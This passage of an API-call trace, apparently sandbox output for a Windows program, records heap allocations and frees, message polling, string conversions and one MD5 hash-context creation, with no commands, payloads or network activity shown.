Flags=0x0, Size=0x4) returned 0x2e54dd8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0215.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.208] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0215.208] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0215.209] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0215.209] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.209] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0215.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0215.209] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.209] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.209] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0215.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0215.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0215.210] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0215.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0215.211] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0215.211] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0215.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0215.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.212] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0215.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0215.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0215.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0215.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0215.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0215.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0215.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0215.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0215.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0215.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.216] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0215.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ed8 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0215.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0215.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0215.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0215.218] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0215.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0215.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0215.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0215.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0215.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0215.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0215.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0215.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0215.220] RtlAllocateHeap 